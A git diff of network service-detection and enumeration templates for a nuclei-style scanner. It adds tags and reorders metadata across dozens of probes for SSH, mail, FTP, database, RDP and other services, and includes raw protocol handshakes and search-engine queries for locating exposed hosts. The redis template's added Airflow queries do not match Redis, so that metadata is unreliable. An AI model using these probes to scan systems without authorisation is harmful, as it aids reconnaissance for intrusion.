@@ -14,10 +14,9 @@ info: cwe-id: CWE-200 cpe: cpe:/a:bitvise:winsshd metadata: - shodan-query: product:"bitvise" max-request: 1 - tags: network,ssh,bitvise,detect - + shodan-query: product:"bitvise" + tags: network,ssh,bitvise,detect,detection,tcp tcp: - host: - "{{Hostname}}" diff --git a/network/detection/bluecoat-telnet-proxy-detect.yaml b/network/detection/bluecoat-telnet-proxy-detect.yaml index f8947f2e7c..67cb874d24 100644 --- a/network/detection/bluecoat-telnet-proxy-detect.yaml +++ b/network/detection/bluecoat-telnet-proxy-detect.yaml @@ -11,10 +11,9 @@ info: - https://techdocs.broadcom.com/us/en/symantec-security-software/web-and-network-security/edge-swg/7-3/about-ssl-proxy.html - https://techdocs.broadcom.com/us/en/symantec-security-software/web-and-network-security/edge-swg/7-3.html metadata: - max-request: 1 verified: true - tags: network,bluecoat,proxy,detect - + max-request: 1 + tags: network,bluecoat,proxy,detect,detection,tcp tcp: - inputs: - data: "\r\n" diff --git a/network/detection/cisco-finger-detect.yaml b/network/detection/cisco-finger-detect.yaml index 3e4937c6c7..1ffc81509c 100644 --- a/network/detection/cisco-finger-detect.yaml +++ b/network/detection/cisco-finger-detect.yaml @@ -7,11 +7,10 @@ info: description: | The finger daemon runs on TCP port 79. The client will (in the case of remote hosts) open a connection to port 79. metadata: + verified: true max-request: 1 shodan-query: product:"Cisco fingerd" - verified: true - tags: network,finger,detect,cisco - + tags: network,finger,detect,cisco,detection,tcp tcp: - inputs: - data: "\n" diff --git a/network/detection/clamav-detect.yaml b/network/detection/clamav-detect.yaml index cdabb2ddad..5497437246 100644 --- a/network/detection/clamav-detect.yaml +++ b/network/detection/clamav-detect.yaml @@ -7,11 +7,10 @@ info: description: | Clam AntiVirus is a free software, cross-platform antimalware toolkit able to detect many types of malware, including viruses. metadata: + verified: true max-request: 1 shodan-query: port:3310 product:"ClamAV" - verified: true - tags: network,clamav,detect - + tags: network,clamav,detect,detection,tcp tcp: - inputs: - data: "VERSION" diff --git a/network/detection/cql-native-transport.yaml b/network/detection/cql-native-transport.yaml index 502754b6b2..11338b526d 100644 --- a/network/detection/cql-native-transport.yaml +++ b/network/detection/cql-native-transport.yaml @@ -7,11 +7,10 @@ info: description: | Native transport requests (NTR) are any requests made via the CQL Native Protocol. CQL Native Protocol is the way the Cassandra driver communicates with the server. metadata: + verified: true max-request: 1 shodan-query: cassandra - verified: true - tags: network,cassandra,cql,detect - + tags: network,cassandra,cql,detect,detection,tcp tcp: - inputs: - data: "/n" diff --git a/network/detection/detect-addpac-voip-gateway.yaml b/network/detection/detect-addpac-voip-gateway.yaml index 96c383b8aa..21fd8b0065 100644 --- a/network/detection/detect-addpac-voip-gateway.yaml +++ b/network/detection/detect-addpac-voip-gateway.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: network,addpac,apos,voip,detect + tags: network,addpac,apos,voip,detect,detection,tcp tcp: - inputs: diff --git a/network/detection/detect-jabber-xmpp.yaml b/network/detection/detect-jabber-xmpp.yaml index d8ecc79c8d..7195ed8989 100644 --- a/network/detection/detect-jabber-xmpp.yaml +++ b/network/detection/detect-jabber-xmpp.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: network,jabber,xmpp,messaging,detect + tags: network,jabber,xmpp,messaging,detect,detection,tcp tcp: - inputs: diff --git a/network/detection/dotnet-remoting-service-detect.yaml b/network/detection/dotnet-remoting-service-detect.yaml index d28906d6ff..51a660c5b5 100644 --- a/network/detection/dotnet-remoting-service-detect.yaml +++ b/network/detection/dotnet-remoting-service-detect.yaml @@ -10,11 +10,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: product:"MS .NET Remoting httpd" - verified: true - tags: network,detect,microsoft,dotnet - + tags: network,detect,microsoft,dotnet,detection,tcp tcp: - inputs: - data: "\n" diff --git a/network/detection/esmtp-detect.yaml b/network/detection/esmtp-detect.yaml index 0f5937ac2c..29c0761486 100644 --- a/network/detection/esmtp-detect.yaml +++ b/network/detection/esmtp-detect.yaml @@ -12,11 +12,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - max-request: 4 - shodan-query: ESMTP verified: true - tags: network,detect,smtp,mail - + max-request: 1 + shodan-query: ESMTP + tags: network,detect,smtp,mail,detection,tcp tcp: - inputs: - data: "\n" diff --git a/network/detection/exim-detect.yaml b/network/detection/exim-detect.yaml index 1bc94ab45f..36e5087adb 100644 --- a/network/detection/exim-detect.yaml +++ b/network/detection/exim-detect.yaml @@ -12,11 +12,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - max-request: 2 - shodan-query: product:"Exim smtpd" verified: true - tags: network,detect,smtp,mail,exim - + max-request: 1 + shodan-query: "product:\"Exim smtpd\"" + tags: network,detect,smtp,mail,exim,detection,tcp tcp: - inputs: - data: "\n" diff --git a/network/detection/expn-mail-detect.yaml b/network/detection/expn-mail-detect.yaml index bcd85bb449..91d7e9bbd9 100644 --- a/network/detection/expn-mail-detect.yaml +++ b/network/detection/expn-mail-detect.yaml @@ -7,8 +7,8 @@ info: description: | The "EXPN" can be used by attackers to learn about valid usernames on the target system. On some SMTP servers, EXPN can be used to show the subscribers of a mailing list subscription lists are generally considered to be sensitive information. metadata: - max-request: 4 - tags: mail,expn,network,detect,smtp + max-request: 1 + tags: mail,expn,network,detect,smtp,detection,tcp tcp: - inputs: diff --git a/network/detection/finger-detect.yaml b/network/detection/finger-detect.yaml index b1db8234d0..736f0e305c 100644 --- a/network/detection/finger-detect.yaml +++ b/network/detection/finger-detect.yaml @@ -7,11 +7,10 @@ info: description: | The finger daemon runs on TCP port 79. The client will (in the case of remote hosts) open a connection to port 79. metadata: + verified: true max-request: 1 shodan-query: port:"79" action - verified: true - tags: network,finger,detect - + tags: network,finger,detect,detection,tcp tcp: - inputs: - data: "\n" diff --git a/network/detection/gnu-inetutils-ftpd-detect.yaml b/network/detection/gnu-inetutils-ftpd-detect.yaml index b0f64e9844..c85311da1f 100644 --- a/network/detection/gnu-inetutils-ftpd-detect.yaml +++ b/network/detection/gnu-inetutils-ftpd-detect.yaml @@ -7,11 +7,10 @@ info: description: | The File Transfer Protocol (FTP) is a standard network protocol used to transfer computer files between a client and server on a computer network. metadata: + verified: true max-request: 1 shodan-query: product:"GNU Inetutils FTPd" - verified: true - tags: network,ftp,smartgateway,gnu,inetutils,detect - + tags: network,ftp,smartgateway,gnu,inetutils,detect,detection,tcp tcp: - inputs: - data: "\n" diff --git a/network/detection/gopher-detect.yaml b/network/detection/gopher-detect.yaml index 8b07c94d51..6efb094bbc 100644 --- a/network/detection/gopher-detect.yaml +++ b/network/detection/gopher-detect.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: network,gopher,detect + tags: network,gopher,detect,detection,tcp tcp: - inputs: diff --git a/network/detection/ibm-d2b-database-server.yaml b/network/detection/ibm-d2b-database-server.yaml index f2a84eb117..deafa41531 100644 --- a/network/detection/ibm-d2b-database-server.yaml +++ b/network/detection/ibm-d2b-database-server.yaml @@ -12,11 +12,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: product:"IBM DB2 Database Server" - verified: true - tags: network,ibm,database,db,db2,detect - + tags: network,ibm,database,db,db2,detect,detection,tcp tcp: - inputs: - data: "01c2000000040000b601000053514c4442325241000100000401010005001d008800000001000080000000010900000001000040000000010900000001000040000000010800000004000040000000010400000001000040000000400400000004000040000000010400000004000040000000010400000004000040000000010400000002000040000000010400000004000040000000010000000001000040000000000400000004000080000000010400000004000080000000010400000003000080000000010400000004000080000000010800000001000040000000010400000004000040000000011000000001000080000000011000000001000080000000010400000004000040000000010900000001000040000000010900000001000080000000010400000003000080000000010000000000000000000000000104000001000080000000010000000000000000000000000000000000000000000000000000000001000040000000010000000001000040000000002020202020202020000000000000000000000000000000000100ff000000000000000000000000000000000000000000e404000000000000000000000000000000000000007f" diff --git a/network/detection/imap-detect.yaml b/network/detection/imap-detect.yaml index 22d2ec0ada..9a417a0a22 100644 --- a/network/detection/imap-detect.yaml +++ b/network/detection/imap-detect.yaml @@ -10,11 +10,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: imap - verified: true - tags: network,detect,imap,mail - + tags: network,detect,imap,mail,detection,tcp tcp: - inputs: - data: "\n" diff --git a/network/detection/iplanet-imap-detect.yaml b/network/detection/iplanet-imap-detect.yaml index 586851d2bf..8570172f60 100644 --- a/network/detection/iplanet-imap-detect.yaml +++ b/network/detection/iplanet-imap-detect.yaml @@ -10,10 +10,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - fofa-query: app="iPlanet-Messaging-Server-5.2" && protocol="imap" max-request: 1 - tags: network,imap,detect,iplanet - + fofa-query: app="iPlanet-Messaging-Server-5.2" && protocol="imap" + tags: network,imap,detect,iplanet,detection,tcp tcp: - inputs: - data: "\n" diff --git a/network/detection/java-rmi-detect.yaml b/network/detection/java-rmi-detect.yaml index 527a054c22..7827d8bbba 100644 --- a/network/detection/java-rmi-detect.yaml +++ b/network/detection/java-rmi-detect.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: network,rmi,java,detect + tags: network,rmi,java,detect,detection,tcp tcp: - inputs: - data: "{{hex_decode('4a524d4900024b')}}" diff --git a/network/detection/microsoft-ftp-service.yaml b/network/detection/microsoft-ftp-service.yaml index da5b71a91c..03129922d8 100644 --- a/network/detection/microsoft-ftp-service.yaml +++ b/network/detection/microsoft-ftp-service.yaml @@ -7,11 +7,10 @@ info: description: | The File Transfer Protocol (FTP) is a standard network protocol used to transfer computer files between a client and server on a computer network. metadata: + verified: true max-request: 1 shodan-query: Microsoft FTP Service - verified: true - tags: network,ftp,microsoft,detect - + tags: network,ftp,microsoft,detect,detection,tcp tcp: - inputs: diff --git a/network/detection/mikrotik-ftp-server-detect.yaml b/network/detection/mikrotik-ftp-server-detect.yaml index 7e462acecb..5cbdac8c05 100644 --- a/network/detection/mikrotik-ftp-server-detect.yaml +++ b/network/detection/mikrotik-ftp-server-detect.yaml @@ -7,11 +7,10 @@ info: description: | The File Transfer Protocol (FTP) is a standard network protocol used to transfer computer files between a client and server on a computer network. metadata: + verified: true max-request: 1 shodan-query: product:"MikroTik router ftpd" - verified: true - tags: network,ftp,mikrotik,router,detect - + tags: network,ftp,mikrotik,router,detect,detection,tcp tcp: - inputs: - data: "\n" diff --git a/network/detection/mikrotik-routeros-api.yaml b/network/detection/mikrotik-routeros-api.yaml index 69b48d9be5..119e52677d 100644 --- a/network/detection/mikrotik-routeros-api.yaml +++ b/network/detection/mikrotik-routeros-api.yaml @@ -10,11 +10,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: product:"MikroTik RouterOS API Service" - verified: true - tags: network,mikrotik,detect - + tags: network,mikrotik,detect,detection,tcp tcp: - inputs: - data: "3a0000002f00000002000040020f0001003d050000000000000000000000002f000000000000000000401f0000000000000000000000000000000000" diff --git a/network/detection/mongodb-detect.yaml b/network/detection/mongodb-detect.yaml index 1cd1b6d2dc..20ee91e9ab 100644 --- a/network/detection/mongodb-detect.yaml +++ b/network/detection/mongodb-detect.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: network,mongodb,detect + tags: network,mongodb,detect,detection,tcp tcp: - inputs: diff --git a/network/detection/moveit-sftp-detect.yaml b/network/detection/moveit-sftp-detect.yaml index 7bbb02ecf8..9ef5476b8d 100644 --- a/network/detection/moveit-sftp-detect.yaml +++ b/network/detection/moveit-sftp-detect.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 1 shodan-query: "SSH-2.0-MOVEit" - tags: network,ssh,detect,moveit,sftp + tags: network,ssh,detect,moveit,sftp,detection,tcp tcp: - host: diff --git a/network/detection/msmq-detect.yaml b/network/detection/msmq-detect.yaml index 00e3a4619e..84950825ad 100644 --- a/network/detection/msmq-detect.yaml +++ b/network/detection/msmq-detect.yaml @@ -11,12 +11,11 @@ info: - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-mqqb/50da7ea1-eed7-41f9-ba6a-2aa37f5f1e92 - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-21554 metadata: - censys-query: services.service_name:MSMQ + verified: true max-request: 1 shodan-query: MSMQ - verified: true - tags: network,msmq,detect - + censys-query: services.service_name:MSMQ + tags: network,msmq,detect,detection,tcp tcp: - inputs: - data: 10c00b004c494f523c020000ffffffff00000200d1587355509195954997b6e611ea26c60789cd434c39118f44459078909ea0fc4ecade1d100300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 diff --git a/network/detection/mysql-detect.yaml b/network/detection/mysql-detect.yaml index 1fd8346ac1..d3e59ca297 100644 --- a/network/detection/mysql-detect.yaml +++ b/network/detection/mysql-detect.yaml @@ -10,11 +10,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: product:"MySQL" - verified: true - tags: network,mysql,db,detect - + tags: network,mysql,db,detect,detection,tcp tcp: - inputs: - data: "\n" diff --git a/network/detection/openssh-detect.yaml b/network/detection/openssh-detect.yaml index 3ebb5103c4..80924d06a7 100644 --- a/network/detection/openssh-detect.yaml +++ b/network/detection/openssh-detect.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: seclists,network,ssh,openssh,detect + tags: seclists,network,ssh,openssh,detect,detection,tcp tcp: - host: diff --git a/network/detection/pgsql-detect.yaml b/network/detection/pgsql-detect.yaml index a25fd6b1ae..a42ac2fb94 100644 --- a/network/detection/pgsql-detect.yaml +++ b/network/detection/pgsql-detect.yaml @@ -13,11 +13,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: port:5432 product:"PostgreSQL" - verified: true - tags: network,postgresql,db,detect - + tags: network,postgresql,db,detect,detection,tcp tcp: - inputs: - data: "000000500003000075736572006e75636c6569006461746162617365006e75636c6569006170706c69636174696f6e5f6e616d65007073716c00636c69656e745f656e636f64696e6700555446380000" diff --git a/network/detection/pop3-detect.yaml b/network/detection/pop3-detect.yaml index 47de28817e..69c1d80896 100644 --- a/network/detection/pop3-detect.yaml +++ b/network/detection/pop3-detect.yaml @@ -12,11 +12,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: pop3 port:110 - verified: true - tags: network,detect,pop3,mail - + tags: network,detect,pop3,mail,detection,tcp tcp: - inputs: - data: "\n" diff --git a/network/detection/proftpd-server-detect.yaml b/network/detection/proftpd-server-detect.yaml index f3fcaeb1c9..79c316da19 100644 --- a/network/detection/proftpd-server-detect.yaml +++ b/network/detection/proftpd-server-detect.yaml @@ -7,11 +7,10 @@ info: description: | The File Transfer Protocol (FTP) is a standard network protocol used to transfer computer files between a client and server on a computer network. metadata: + verified: true max-request: 1 shodan-query: product:"ProFTPD" - verified: true - tags: network,ftp,proftpd,detect - + tags: network,ftp,proftpd,detect,detection,tcp tcp: - inputs: - data: "\n" diff --git a/network/detection/rabbitmq-detect.yaml b/network/detection/rabbitmq-detect.yaml index 2ff24e5bd3..93b2e26950 100644 --- a/network/detection/rabbitmq-detect.yaml +++ b/network/detection/rabbitmq-detect.yaml @@ -9,11 +9,10 @@ info: reference: - https://nmap.org/nsedoc/scripts/amqp-info.html metadata: + verified: true max-request: 1 shodan-query: product:"RabbitMQ" - verified: true - tags: network,rabbitmq,oss,detect - + tags: network,rabbitmq,oss,detect,detection,tcp tcp: - inputs: - data: "AMQP\u0000\u0000\t\u0001" diff --git a/network/detection/rdp-detect.yaml b/network/detection/rdp-detect.yaml index b189855773..f42c92112c 100644 --- a/network/detection/rdp-detect.yaml +++ b/network/detection/rdp-detect.yaml @@ -10,10 +10,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - max-request: 1 verified: true - tags: network,windows,rdp,detect - + max-request: 1 + tags: network,windows,rdp,detect,detection,tcp tcp: - inputs: - data: "0300002a25e00000000000436f6f6b69653a206d737473686173683d746573740d0a010008000b000000" diff --git a/network/detection/redis-detect.yaml b/network/detection/redis-detect.yaml index 833dde5b80..411a6d0cef 100644 --- a/network/detection/redis-detect.yaml +++ b/network/detection/redis-detect.yaml @@ -11,8 +11,20 @@ info: metadata: verified: true max-request: 2 - shodan-query: product:"redis" - tags: network,redis,detect + shodan-query: + - product:"redis" + - http.title:"airflow - dags" || http.html:"apache airflow" + - http.title:"sign in - airflow" + product: airflow + vendor: apache + fofa-query: + - apache airflow + - title="airflow - dags" || http.html:"apache airflow" + - title="sign in - airflow" + google-query: + - intitle:"airflow - dags" || http.html:"apache airflow" + - intitle:"sign in - airflow" + tags: network,redis,detect,detection,tcp tcp: - inputs: - data: "*1\r\n$4\r\ninfo\r\n" diff --git a/network/detection/riak-detect.yaml b/network/detection/riak-detect.yaml index a566d47a41..e429483b46 100644 --- a/network/detection/riak-detect.yaml +++ b/network/detection/riak-detect.yaml @@ -6,11 +6,10 @@ info: severity: info description: Riak is a distributed NoSQL key-value data store that offers high availability, fault tolerance, operational simplicity, and scalability. metadata: + verified: true max-request: 1 shodan-query: product:"Riak" - verified: true - tags: network,oss,detect,riak,nosql - + tags: network,oss,detect,riak,nosql,detection,tcp tcp: - inputs: - data: 0000000107 diff --git a/network/detection/rpcbind-portmapper-detect.yaml b/network/detection/rpcbind-portmapper-detect.yaml index bff4819a5c..32fb4eb24b 100644 --- a/network/detection/rpcbind-portmapper-detect.yaml +++ b/network/detection/rpcbind-portmapper-detect.yaml @@ -10,11 +10,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: port:"111" - verified: true - tags: network,rpcbind,portmap,detect - + tags: network,rpcbind,portmap,detect,detection,tcp tcp: - inputs: - data: 8000002836ed646d0000000000000002000186a0000000040000000400000000000000000000000000000000 diff --git a/network/detection/rsyncd-service-detect.yaml b/network/detection/rsyncd-service-detect.yaml index b146a8b776..84f97ace50 100644 --- a/network/detection/rsyncd-service-detect.yaml +++ b/network/detection/rsyncd-service-detect.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: network,rsyncd,detect + tags: network,rsyncd,detect,detection,tcp tcp: - inputs: diff --git a/network/detection/rtsp-detect.yaml b/network/detection/rtsp-detect.yaml index 330b2e95be..69be4012b8 100644 --- a/network/detection/rtsp-detect.yaml +++ b/network/detection/rtsp-detect.yaml @@ -12,11 +12,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: RTSP/1.0 - verified: true - tags: network,rtsp,detect - + tags: network,rtsp,detect,detection,tcp tcp: - inputs: - data: 4f5054494f4e53207369703a6e6d205349502f322e300d0a5669613a205349502f322e302f544350206e6d3b6272616e63683d666f6f0d0a46726f6d3a203c7369703a6e6d406e6d3e3b7461673d726f6f740d0a546f3a203c7369703a6e6d32406e6d323e0d0a43616c6c2d49443a2035303030300d0a435365713a203432204f5054494f4e530d0a4d61782d466f7277617264733a2037300d0a436f6e74656e742d4c656e6774683a20300d0a436f6e746163743a203c7369703a6e6d406e6d3e0d0a4163636570743a206170706c69636174696f6e2f7364700d0a0d0a diff --git a/network/detection/sap-router.yaml b/network/detection/sap-router.yaml index 461f6b0cd0..10b43d9f8a 100644 --- a/network/detection/sap-router.yaml +++ b/network/detection/sap-router.yaml @@ -8,7 +8,7 @@ info: SAProuter is a software application that provides a remote connection between our customer's network and SAP. metadata: max-request: 1 - tags: network,sap,detect,saprouter + tags: network,sap,detect,saprouter,detection,tcp tcp: - inputs: diff --git a/network/detection/smtp-detect.yaml b/network/detection/smtp-detect.yaml index 5031317fb3..ee7a880920 100644 --- a/network/detection/smtp-detect.yaml +++ b/network/detection/smtp-detect.yaml @@ -7,8 +7,8 @@ info: description: | SMTP is part of the application layer of the TCP/IP protocol. Using a process called “store and forward,” SMTP moves your email on and across networks. metadata: - max-request: 4 - tags: network,service,smtp,detect,mail + max-request: 1 + tags: network,service,smtp,detect,mail,detection,tcp tcp: - inputs: diff --git a/network/detection/sshd-dropbear-detect.yaml b/network/detection/sshd-dropbear-detect.yaml index a4720e86f8..2ec3ca50eb 100644 --- a/network/detection/sshd-dropbear-detect.yaml +++ b/network/detection/sshd-dropbear-detect.yaml @@ -7,11 +7,10 @@ info: description: | Dropbear is a software package written by Matt Johnston that provides a Secure Shell-compatible server and client. It is designed as a replacement for standard OpenSSH for environments with low memory and processor resources, such as embedded systems metadata: + verified: true max-request: 1 shodan-query: product:"Dropbear sshd" - verified: true - tags: network,ssh,dropbear,detect - + tags: network,ssh,dropbear,detect,detection,tcp tcp: - inputs: diff --git a/network/detection/starttls-mail-detect.yaml b/network/detection/starttls-mail-detect.yaml index c08e550132..69da87ea78 100644 --- a/network/detection/starttls-mail-detect.yaml +++ b/network/detection/starttls-mail-detect.yaml @@ -7,8 +7,8 @@ info: description: | STARTTLS is an email protocol command that tells an email server that an email client, including an email client running in a web browser, wants to turn an existing insecure connection into a secure one. metadata: - max-request: 4 - tags: mail,starttls,network,detect,smtp + max-request: 1 + tags: mail,starttls,network,detect,smtp,detection,tcp tcp: - inputs: diff --git a/network/detection/teamspeak3-detect.yaml b/network/detection/teamspeak3-detect.yaml index d82d3be2bf..cac95801e7 100644 --- a/network/detection/teamspeak3-detect.yaml +++ b/network/detection/teamspeak3-detect.yaml @@ -7,10 +7,10 @@ info: description: | ServerQuery is a commandline based administration tool/feature of TeamSpeak 3 server. metadata: + verified: true max-request: 1 shodan-query: product:"TeamSpeak 3 ServerQuery" - verified: true - tags: network,service,teamspeak3,detect + tags: network,service,teamspeak3,detect,detection,tcp tcp: - inputs: - data: "\r\n" diff --git a/network/detection/telnet-detect.yaml b/network/detection/telnet-detect.yaml index e927b88941..9e0a233339 100644 --- a/network/detection/telnet-detect.yaml +++ b/network/detection/telnet-detect.yaml @@ -7,11 +7,10 @@ info: description: | Telnet is a network protocol used to virtually access a computer and to provide a two-way, collaborative and text-based communication channel between two machines. metadata: + verified: true max-request: 1 shodan-query: port:23 telnet - verified: true - tags: network,telnet,detect - + tags: network,telnet,detect,detection,tcp tcp: - inputs: - data: "\n" diff --git a/network/detection/totemomail-smtp-detect.yaml b/network/detection/totemomail-smtp-detect.yaml index 09fa959d21..4799e650b1 100644 --- a/network/detection/totemomail-smtp-detect.yaml +++ b/network/detection/totemomail-smtp-detect.yaml @@ -7,8 +7,8 @@ info: description: | Totemomail is a comprehensive email solution designed to address all aspects of digital communication security. metadata: - max-request: 3 - tags: mail,smtp,network,totemomail,detect + max-request: 1 + tags: mail,smtp,network,totemomail,detect,detection,tcp tcp: - inputs: diff --git a/network/detection/vmware-authentication-daemon-detect.yaml b/network/detection/vmware-authentication-daemon-detect.yaml index e7d189ea39..b51db23958 100644 --- a/network/detection/vmware-authentication-daemon-detect.yaml +++ b/network/detection/vmware-authentication-daemon-detect.yaml @@ -7,11 +7,10 @@ info: description: | vmauthd is the VMWare authentication daemon that is included with many VMWare products, including ESX(i), and Workstation. metadata: + verified: true max-request: 1 shodan-query: product:"VMware Authentication Daemon" - verified: true - tags: network,vmware,authenticated,detect - + tags: network,vmware,authenticated,detect,detection,tcp tcp: - inputs: diff --git a/network/detection/vnc-service-detect.yaml b/network/detection/vnc-service-detect.yaml index 88e236633e..410d518ce6 100644 --- a/network/detection/vnc-service-detect.yaml +++ b/network/detection/vnc-service-detect.yaml @@ -9,7 +9,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: network,vnc,service,detect + tags: network,vnc,service,detect,detection,tcp tcp: - inputs: diff --git a/network/detection/weblogic-iiop-detect.yaml b/network/detection/weblogic-iiop-detect.yaml index 13d3028014..10778d7b20 100644 --- a/network/detection/weblogic-iiop-detect.yaml +++ b/network/detection/weblogic-iiop-detect.yaml @@ -8,7 +8,7 @@ info: The IIOP (Internet Inter-ORB Protocol) protocol makes it possible for distributed programs written in different programming languages to communicate over the Internet. metadata: max-request: 1 - tags: network,weblogic,detect,oracle,iiop + tags: network,weblogic,detect,oracle,iiop,detection,tcp tcp: - inputs: - data: "{{hex_decode('47494f50010200030000001700000002000000000000000b4e616d6553657276696365')}}" diff --git a/network/detection/weblogic-t3-detect.yaml b/network/detection/weblogic-t3-detect.yaml index 918e7fe59f..ad4b832f9f 100644 --- a/network/detection/weblogic-t3-detect.yaml +++ b/network/detection/weblogic-t3-detect.yaml @@ -12,7 +12,7 @@ info: Ensure proper configuration and security measures are in place for Weblogic T3 Protocol metadata: max-request: 2 - tags: network,weblogic,detect,t3,oracle + tags: network,weblogic,detect,t3,oracle,detection,tcp tcp: - inputs: diff --git a/network/detection/wing-ftp-detect.yaml b/network/detection/wing-ftp-detect.yaml index f73ee40f28..f458f2db5d 100644 --- a/network/detection/wing-ftp-detect.yaml +++ b/network/detection/wing-ftp-detect.yaml @@ -10,7 +10,7 @@ info: max-request: 1 verified: true shodan-query: "Wing FTP Server" - tags: network,ftp,wing,detect + tags: network,ftp,wing,detect,detection,tcp tcp: - inputs: diff --git a/network/detection/ws_ftp-ssh-detect.yaml b/network/detection/ws_ftp-ssh-detect.yaml index 56a7c89681..96c9c38eab 100644 --- a/network/detection/ws_ftp-ssh-detect.yaml +++ b/network/detection/ws_ftp-ssh-detect.yaml @@ -8,16 +8,26 @@ info: WS_FTP-SSH service was detected. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: verified: true max-request: 1 vendor: progress product: ws_ftp - shodan-query: "WS_FTP port:22" - tags: network,ssh,ws_ftp,detect,progress - + shodan-query: + - "WS_FTP port:22" + - ws_ftp port:22 + - http.title:"ad hoc transfer" + - http.title:"ws_ftp server web transfer" + fofa-query: + - title="ws_ftp server web transfer" + - title="ad hoc transfer" + google-query: + - intitle:"ws_ftp server web transfer" + - intitle:"ad hoc transfer" + censys-query: services.http.request.uri="*/thinclient/wtm/public/index.html" + tags: network,ssh,ws_ftp,detect,progress,detection,tcp tcp: - host: - "{{Hostname}}" diff --git a/network/detection/xlight-ftp-service-detect.yaml b/network/detection/xlight-ftp-service-detect.yaml index 7b6ee3d28d..768b03b4be 100644 --- a/network/detection/xlight-ftp-service-detect.yaml +++ b/network/detection/xlight-ftp-service-detect.yaml @@ -7,11 +7,10 @@ info: description: | The File Transfer Protocol (FTP) is a standard network protocol used to transfer computer files between a client and server on a computer network. metadata: + verified: true max-request: 1 shodan-query: product:"Xlight ftpd" - verified: true - tags: network,ftp,xlight,detect - + tags: network,ftp,xlight,detect,detection,tcp tcp: - inputs: diff --git a/network/enumeration/beanstalk-service.yaml b/network/enumeration/beanstalk-service.yaml index ebd0a6e0f9..6ecb51e21a 100644 --- a/network/enumeration/beanstalk-service.yaml +++ b/network/enumeration/beanstalk-service.yaml @@ -9,11 +9,10 @@ info: reference: - https://jhadiary.wordpress.com/2016/05/18/beanstalk-helping-commands/ metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: port:11300 "cmd-peek" - tags: network,beanstalk,detect,enum - + tags: network,beanstalk,detect,enum,tcp tcp: - inputs: - data: "stats\r\n" diff --git a/network/enumeration/kafka-topics-list.yaml b/network/enumeration/kafka-topics-list.yaml index abec99584e..90156a3d64 100644 --- a/network/enumeration/kafka-topics-list.yaml +++ b/network/enumeration/kafka-topics-list.yaml @@ -7,11 +7,10 @@ info: description: | Kafka topics are logical data streams that store and organize messages in Apache Kafka. They provide a way for data to be published, subscribed to, and processed by Kafka consumers. metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: product:"Kafka" - tags: network,detect,enum,kafka,apache - + tags: network,detect,enum,kafka,apache,tcp tcp: - inputs: - data: 00000020000300000000000200126b61666b612d707974686f6e2d322e302e3200000000 diff --git a/network/enumeration/mongodb-info-enum.yaml 